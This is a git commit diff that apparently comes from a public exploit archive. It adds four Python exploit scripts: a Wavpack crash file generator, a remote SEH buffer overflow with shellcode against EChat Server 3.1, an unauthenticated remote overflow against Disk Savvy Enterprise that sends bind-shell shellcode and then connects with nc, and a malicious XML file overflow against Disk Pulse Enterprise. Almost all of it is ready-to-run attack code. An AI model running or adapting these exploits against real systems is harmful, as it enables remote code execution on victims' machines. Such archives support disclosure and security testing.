DB: 2018-02-22

4 changes to exploits/shellcodes Wavpack 5.1.0 - Denial of Service utorrent - JSON-RPC Remote Code Execution / Information Disclosure μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH) Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)
2018-02-22 05:01:46 +00:00 · 2018-02-22 05:01:46 +00:00 · a4f01ec6e4
commit a4f01ec6e4
parent b5d3581200
5 changed files with 251 additions and 1 deletions
--- a/exploits/multiple/dos/44154.py
+++ b/exploits/multiple/dos/44154.py
@ -0,0 +1,44 @@
+# Exploit title: Wavpack 5.1.0 - Denial of Service
+# Date: 20.02.2018
+# Exploit Author: r4xis
+# https://github.com/r4xis
+#
+# Vendor Homepage:  http://www.wavpack.com/
+# Software Links:   http://www.wavpack.com/downloads.html
+#                   https://github.com/dbry/WavPack
+#
+#
+# Version: Wavpack 5.1.0
+# Tested on:    Debian 9.3.0 64 bit
+#               Windows 7 32 bit and 64 bit
+#               Windows 8 64 bit
+#
+#
+# CVE: CVE-2018-7254
+# CVE Details:
+# https://nvd.nist.gov/vuln/detail/CVE-2018-7254
+# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
+# https://github.com/dbry/WavPack/issues/26
+
+
+import os
+
+head = "\x63\x61\x66\x66"
+version = "\x00\x01"
+junk1 = "\x00"*(0xa0-6)
+crash = "\x80"
+junk2 = "\x00"*100
+
+f=open("poc.caf", 'w')
+f.write(head+version+junk1+crash+junk2)
+f.close()
+
+os.system("wavpack poc.caf")
+
+'''
+Debian gdb output:
+Program received signal SIGSEGV, Segmentation fault.
+__memmove_sse2_unaligned_erms ()
+    at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333
+333	../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
+'''
--- a/exploits/windows/remote/44155.py
+++ b/exploits/windows/remote/44155.py
@ -0,0 +1,65 @@
+# Exploit Author: Juan Sacco <jsacco@exploitpack.com>
+# Vulnerability found using Exploit Pack v10 - http://exploitpack.com
+#
+# Impact:
+# An attacker could exploit this vulnerability to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in adenial-of-service condition.
+#
+# Program description:
+# Easy Chat Server is a easy, fast and affordable way to host and manage your own real-time communication software,
+# it allows friends/colleagues to chat with you through a Web Browser (IE, Safari, Chrome, Opera etc.)
+# Vendor page: http://www.echatserver.com/
+
+import string, sys
+import socket, httplib
+import struct
+
+def exploit():
+  try:
+    junk = '\x41' * 217
+    shortjmp = "\xeb\x08\xcc\xcc" # Jump over SEH
+    seh = struct.pack('<L', 0x100154c5) # ADD ESP,2C # POP ESI # ADD ESP,0C # RETN    ** [SSLEAY32.dll] **   |   {PAGE_EXECUTE_READ}
+    buffersize = 2775
+    nops = "\x90"
+    # debug = "\xcc\xcc\xcc\xcc"
+    shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
+                 "\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
+                 "\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
+                 "\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
+                 "\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
+                 "\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
+                 "\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
+                 "\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
+                 "\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
+                 "\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
+                 "\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
+                 "\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
+                 "\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
+                 "\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
+                 "\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
+                 "\x1c\x80")
+    buffer = junk + shortjmp + seh + nops * (buffersize -
+(len(shellcode))) + shellcode
+    print buffer
+    URL = '/chat.ghp?username=' + buffer + '&password=null&room=1&null=2'
+    conn = httplib.HTTPConnection(host, port)
+    conn.request('GET', URL)
+    conn.close()
+  except Exception as Error:
+    print "[!] Something went wrong!"
+    print Error
+
+def howtousage():
+  print "[!] Sorry, minimum required arguments: [host] [port]"
+  sys.exit(-1)
+
+if __name__ == '__main__':
+  print "[*] EChat Server v3.1 CHAT.ghp (UserName)"
+  print "[*] Author: Juan Sacco <jsacco@exploitpack>"
+
+  try:
+    host = sys.argv[1]
+    port = sys.argv[2]
+  except IndexError:
+    howtousage()
+exploit()
--- a/exploits/windows/remote/44156.py
+++ b/exploits/windows/remote/44156.py
@ -0,0 +1,92 @@
+# Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH
+# Date: 01/02/2018
+# Exploit Author: Daniel Teixeira
+# Vendor Homepage: http://www.disksavvy.com/
+# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe
+# Version: 10.4.18
+# CVE: CVE-2018-6481
+# Tested on: Windows 7 x86
+
+
+from struct import pack
+from os import system
+from sys import exit
+from time import sleep
+import socket
+
+port = 9124
+host = "172.16.40.148"
+
+# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode 
+shellcode =  ""
+shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"
+shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"
+shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"
+shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"
+shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"
+shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"
+shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"
+shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"
+shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"
+shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"
+shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"
+shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"
+shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"
+shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"
+shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"
+shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"
+shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"
+shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"
+shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"
+shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"
+shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"
+shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"
+shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"
+shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"
+shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"
+shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"
+shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"
+shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"
+shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"
+shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"
+
+payload =  "A" * 124            # offset
+payload += "\x90\x09\xeb\x05"   # jmp over seh retrun value
+payload += "\x13\x6d\x05\x10"   # 0x10056d13 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Disk Savvy Enterprise\bin\libspp.dll)
+
+
+
+payload += "\x90" * 10
+payload += "\x83\xc4\x64" * 20  # metasm > add esp,100
+payload += "\xff\xe4"           # metasm > jmp esp
+payload += "\x90" * (1000 - len(payload) - len(shellcode))
+payload += shellcode
+
+header =  "\x75\x19\xba\xab"
+header += "\x03\x00\x00\x00"
+header += "\x00\x40\x00\x00"
+header += pack('<I', len(payload))
+header += pack('<I', len(payload))
+header += pack('<I', ord(payload[-1]))
+packet = header
+packet += payload 
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+
+    print "[*] Testing connection to tatget %s:%s" %(host,port)
+    s.connect((host, port))
+
+except:
+
+    print "[-] Unable to communicate to target %s:%s" %(host,port)
+
+    exit()
+
+s.send(packet)
+
+print "[*] Payload Sent.."
+print "[*] Connecting to bind shell %s:4444 .." %host
+sleep(5)
+system("nc %s 4444"%host)
--- a/exploits/windows/remote/44157.py
+++ b/exploits/windows/remote/44157.py
@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+# Exploit Title: Disk Pulse Enterprise v10.4.18 - 'Import Command' Buffer Overflow (SEH)
+# Date: 2018-01-22
+# Exploit Author: Daniel Teixeira
+# Author Homepage: www.danielteixeira.com
+# Vendor Homepage: http://www.diskpulse.com
+# Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v10.4.18.exe
+# Version: 10.4.16
+# Tested on: Windows 7 SP1 x86
+# CVE: CVE-2017-7310 
+
+import os,struct
+
+#Buffer overflow
+junk = "A"*1560
+
+#JMP ESP (QtGui4.dll)
+jmpesp= struct.pack('<L',0x651bb77a)
+
+#NOPS
+nops = "\x90"
+
+#LEA   EAX, [ESP+76]
+esp = "\x8D\x44\x24\x4C"
+#JMP ESP
+jmp = "\xFF\xE0"
+
+#JMP Short = EB 05
+nSEH = "\x90\x90\xEB\x05" #Jump short 5
+#POP POP RET (QtGui4.dll)
+SEH = struct.pack('<L',0x67033072)
+
+#CALC.EXE
+shellcode =  "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
+
+#PAYLOAD
+payload = junk + jmpesp + nops * 16 + esp + jmp + nops * 68 + nSEH + SEH + nops * 10 + shellcode + nops * 5000
+
+#FILE
+file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + payload + '\n</classify>'
+
+f = open('Exploit.xml', 'w')
+f.write(file)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5869,6 +5869,7 @@ id,file,description,date,author,type,platform,port
 43344,exploits/windows/dos/43344.py,"Sync Breeze 10.2.12 - Denial of Service",2017-12-15,"Manuel García Cárdenas",dos,windows,
 44146,exploits/windows/dos/44146.cpp,"Microsoft Windows Kernel - 'nt!RtlpCopyLegacyContextX86' Stack Memory Disclosure",2018-02-20,"Google Security Research",dos,windows,
 44153,exploits/windows/dos/44153.html,"Microsoft Internet Explorer 11 - 'Js::RegexHelper::RegexReplace' Use-After-Free",2018-02-20,"Google Security Research",dos,windows,
+44154,exploits/multiple/dos/44154.py,"Wavpack 5.1.0 - Denial of Service",2018-02-21,r4xis,dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16244,7 +16245,10 @@ id,file,description,date,author,type,platform,port
 43339,exploits/windows/remote/43339.rb,"Dup Scout Enterprise - 'Login' Buffer Overflow (Metasploit)",2017-12-14,Metasploit,remote,windows,
 43341,exploits/php/remote/43341.rb,"pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit)",2017-12-14,Metasploit,remote,php,
 43342,exploits/hardware/remote/43342.txt,"Palo Alto Networks Firewalls - Root Remote Code Execution",2017-12-14,"Philip Pettersson",remote,hardware,
-44151,exploits/multiple/remote/44151.txt,"utorrent - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,
+44151,exploits/multiple/remote/44151.txt,"μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,
+44155,exploits/windows/remote/44155.py,"EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow",2018-02-21,"Juan Sacco",remote,windows,
+44156,exploits/windows/remote/44156.py,"Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
+44157,exploits/windows/remote/44157.py,"Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,